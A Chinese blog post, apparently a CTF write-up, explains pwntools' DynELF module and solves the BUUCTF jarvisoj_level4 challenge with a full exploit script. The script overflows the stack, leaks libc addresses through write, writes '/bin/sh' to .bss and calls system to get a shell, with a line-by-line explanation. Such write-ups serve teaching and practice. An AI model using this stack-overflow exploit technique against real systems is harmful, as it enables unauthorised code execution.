[PWN] jarvisoj_level4 DynELF()函数使用总结

最新推荐文章于 2024-07-25 16:32:50 发布
最新推荐文章于 2024-07-25 16:32:50 发布
阅读量88 收藏 2
点赞数
分类专栏: PWN 栈溢出 技巧 文章标签: 系统安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55700752/article/details/132924112
版权
PWN 同时被 3 个专栏收录
13 篇文章 0 订阅
订阅专栏
技巧
8 篇文章 0 订阅
订阅专栏
栈溢出
4 篇文章 0 订阅
订阅专栏

参考:
https://blog.csdn.net/qq_40827990/article/details/86689760
https://blog.csdn.net/weixin_45770420/article/details/130493348

DynELF

DynELF是pwntools中专门用来应对题目中没有libc情况的漏洞利用模块,提供一个可以泄漏任意内存的函数后,任何被动态加载的库的任何符号都可以被解析
DynELF就是通过程序漏洞泄露出任意地址内容,结合ELF文件的结构特征获取对应版本文件并计算对比出目标符号在内存中的地址

使用模板

def leak(addr):
	   # 泄露 任意函数的地址
       payload=****+ p64(addr) +****”
       p.send(payload)
       data = p.recv()
       return data
# pointer 可选择 
d = DynELF(leak, pointer = pointer_into_ELF_file, elf = ELFObject)
system_addr = d.lookup('system', 'libc')
read_add = d.lookup('read','libc')

官网说明

# 假设现在有一个进程或者远程连接
p = process('./pwnme')

# 声明一个函数, 这个函数只接收一个参数, 作为要被泄漏的内存地址
# 并且至少泄漏这个地址的一个字节的数据
def leak(address):
    data = p.read(address, 4)
    log.debug("%#x => %s" % (address, (data or '').encode('hex')))
    return data

# 为了便于说明这个例子
# 假设我们有任意多的指针
# 一个指针指向二进制程序的某一个符号的指针
# 另两个指针指向 libc
main   = 0xfeedf4ce
libc   = 0xdeadb000
system = 0xdeadbeef

# 使用我们的泄漏器, 和一个指向二进制程序的某一个符号的指针
# 我们就能泄漏这个内存地址的任意数据
# 事实上为了解析符号, 我们都不需要对目标二进制进行拷贝
d = DynELF(leak, main)
assert d.lookup(None,     'libc') == libc
assert d.lookup('system', 'libc') == system

# 然而, 如果我们拷贝了这个二进制程序
# 这一步的速度就会快一点
d = DynELF(leak, main, elf=ELF('./pwnme'))
assert d.lookup(None,     'libc') == libc
assert d.lookup('system', 'libc') == system

# 我们也可以解析别的 lib 中的符号
# 然后返回这个符号的指针
d = DynELF(leak, libc + 0x1234)
assert d.lookup('system')      == system

注意事项

leak函数需要使用目标程序本身的漏洞泄露出由DynELF类传入的int型参数addr对应的内存地址中的数据。且由于DynELF会多次调用leak函数,这个函数必须能任意次使用,即不能泄露几个地址之后就导致程序崩溃。由于需要泄露数据,payload中必然包含着打印函数,如write, puts, printf等;
write函数是最理想的,write函数的特点在于其输出完全由其参数size决定,只要目标地址可读,size填多少就输出多少,不会受到诸如‘\0’, ‘\n’之类的字符影响;
puts, printf函数会受到诸如‘\0’, ‘\n’之类的字符影响,在对数据的读取和处理有一定的难度
在信息泄露过程中,由于循环制造溢出,故可能会导致栈结构发生不可预料的变化,可以尝试调用目标二进制程序的_start函数来重新开始程序以恢复栈.

例题:BUUCTF jarvisoj_level4

在这里插入图片描述
简单明显的栈溢出,ret2libc失败,LibSearch没找到对应的libc版本
需要将/bin/sh字符串写在bss段,作为system函数的参数以获取shell
大佬的WP:

from pwn import *
from time import sleep
import sys
context.binary = "./level4"
elf = context.binary
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]

if sys.argv[1] == "l":
    io = process("./level4")
else:
    io = remote('node4.buuoj.cn',26657)

def leak(addr):
    payload = flat(cyclic(0x88 + 4), elf.plt['write'], elf.sym['_start'], 1, addr, 4)
    io.send(payload)
    sleep(0.01)
    leaked = io.recv(4)
    info("leaked -> {}".format(leaked))
    return leaked

d = DynELF(leak, elf=ELF('./level4'))
system_addr = d.lookup('system', 'libc')
success("system -> {:#x}".format(system_addr))
# pause()
#  gdb.attach(io)
payload = flat(cyclic(0x88 + 4), elf.sym['read'], elf.sym['_start'], 0, elf.bss() + 0x500, 8)
io.send(payload)
sleep(0.01)
io.send("/bin/sh\0")
sleep(0.01)

payload = flat(cyclic(0x88 + 4), system_addr, 'aaaa', elf.bss() + 0x500)
io.send(payload)
io.interactive()

解析

leak函数:利用write函数打印addr地址的内容(即任意函数的地址),执行完write函数返回_start函数 程序入口,接收并返回打印的内容

def leak(addr):
    payload = flat(cyclic(0x88 + 4), elf.plt['write'], elf.sym['_start'], 1, addr, 4)
    io.send(payload)
    sleep(0.01)
    leaked = io.recv(4)
    info("leaked -> {}".format(leaked))
    return leaked

调用DynELF()函数,lookup获取system函数的地址

d = DynELF(leak, elf=ELF('./level4'))
system_addr = d.lookup('system', 'libc')

利用read函数向bss段中间某位置写入/bin/sh字符串

payload = flat(cyclic(0x88 + 4), elf.sym['read'], elf.sym['_start'], 0, elf.bss() + 0x500, 8)

最后调用system(“/bin/sh”)函数获取shell

payload = flat(cyclic(0x88 + 4), system_addr, 'aaaa', elf.bss() + 0x500)
看海就会失去海
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 399
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数使用LibcSearcher寻找libc版本和DynELF函数使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
BUUCTF pwn——jarvisoj_level4
CNS-Enterprise BCC-1701-J
05-04 221
BUUCTF 做题练习
Jarvis OJ Level4
qq_39153421的博客
09-19 375
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
jarvisoj的pwn中level系列wp
Huiuyao的博客
12-09 2800
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 672
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
Linux:基础命令学习
qq_55038440的博客
07-20 1186
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
Linux:进程信号(一.认识信号、信号的产生及深层理解、Term与Core)
qq_74415153的博客
07-23 1366
1.认识信号 进程看待信号方式 2.信号的产生 2.1信号的处理的方式 --- signal()函数 2.2kil指令产生信号 2.3键盘产生信号 2.4系统调用发送信号 -kil系统调 用、raise()和abort()库函数 2.5软件条件产生信号 2.6异常产生信号 3.信号产生的深层理解 键盘产生信号 异常产生信号 4.Term与Core core文件
【Linux】-----权限详解
m0_73470633的博客
07-21 717
Linux权限详解,看这一篇就够了!!!!!!
【嵌入式开发 Linux 常用命令系列 7.7 -- find 和 sed 配合使用介绍】
CodingCos的博客
07-24 302
命令将文件中所有"demo" 字符串替换为 “hello”
linux+springboot+nginx转rtsp流为hls流
最新发布
k0933的博客
07-25 126
1、基本逻辑为前端请求时获取新的rtsp流地址,调用一次rtsp2Hls转码方法,将生成新的hls切片文件(不用考虑旧文件,将会覆盖),转码时先停止当前转码线程,再创建新的线程。2、线程监控:开启一个定时任务,每10分钟查看一次,若有异常线程,则重新获取rtsp流地址进行转码,在晚上8点后则停止所有转码任务。1、下载(自定义版本:http://www.ffmpeg.org/releases/)#编译安装(默认安装在/usr/local/nginx)进入:/usr/local/nginx/sbin。
linux 查看当前目录下占用空间命令
Damien_J_Scott的博客
07-25 100
du -sh */
linux字符设备驱动+fops应用测试程序
qq_39797956的博客
07-21 226
【代码】linux字符设备驱动+fops应用测试程序。
【linux】Shell脚本三剑客之grep和egrep命令的详细用法攻略
景天科技苑
07-25 710
在Linux和Unix系统中,grep(Global Regular Expression Print)是一个非常强大的文本搜索工具,能够根据用户指定的模式(由正则表达式和文本字符组合而成)对目标文件进行逐行搜索,并显示匹配到的行。而egrep(Extended Grep)则是`grep`的扩展版本,支持更多的正则表达式语法。尽管egrep在较新的系统中被`grep -E`选项所取代,但了解其用法对于理解和使用正则表达式仍然具有重要意义。
jarvisoj_level1
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值